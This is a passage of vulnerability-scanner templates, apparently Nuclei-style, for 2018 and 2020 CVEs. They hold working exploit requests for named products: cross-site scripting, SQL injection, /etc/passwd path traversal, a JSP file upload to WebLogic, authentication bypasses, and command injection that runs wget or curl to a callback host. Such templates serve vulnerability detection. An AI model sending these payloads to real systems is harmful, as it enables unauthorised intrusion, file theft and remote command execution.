Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7193","info":{"name":"osTicket < 1.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /scp/directory.php?&&order=\"><script>alert(document.domain);</script>&sort=dept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"\\\"><script>alert(document.domain);</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-7314","info":{"name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-7192","info":{"name":"osTicket < 1.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /ajax.php/form/help-topic/1?a934f512c6644b03=&message=dgh7r%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20qavj5 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"dgh7r onmouseover=alert(document.domain) style=position:\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://oast.me'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12256","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /devicemgmt.php?deviceId=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/eventON/"]}]},{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-12124","info":{"name":"WAVLINK WN530H4 live_api.cgi - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"word","part":"body","words":["WiFiBand"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: 